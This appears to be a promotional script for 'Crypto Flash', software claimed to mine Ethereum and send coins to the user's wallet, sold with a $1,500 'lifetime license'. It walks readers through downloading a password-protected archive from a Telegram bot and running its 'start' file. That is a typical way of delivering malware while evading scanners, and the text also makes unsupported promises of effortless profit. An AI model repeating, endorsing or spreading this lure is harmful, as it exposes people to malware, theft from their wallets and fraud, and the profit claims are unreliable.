Welcome to the future of finance. Cryptocurrencies aren't just a trend. They're a revolution reshaping the world. Ethereum stands at the forefront, offering unmatched potential for growth and profit. Blockchain technology unlocks freedom, independence, and financial success. But how can you tap into this opportunity? Today, I'll show you groundbreaking software that mines Ethereum using cutting-edge Flash technology and sends coins straight to your wallet. Let me introduce Crypto Flash, a powerful tool designed to mine Ethereum efficiently and effortlessly. This software leverages advanced algorithms to maximize your earnings, and it's incredibly easy to use. To test the program for one day, follow these steps. Download the Crypto Flash archive from the official Telegram bot. Unpack the archive, which contains a text file with a password and the start file. Run start and enter the password from the text file to activate the program. Once activated, simply select your mining power and enter your Ethereum wallet address. That's it. Your earnings start flowing in. Want full access? Get the lifetime license for just $1,500, including lifelong support and security guarantees. Don't miss out. This is your chance to join the crypto revolution. But beware, scams and fakes are everywhere. Only trust official sources. Click the link in comments, test the software, and take your first step toward financial freedom.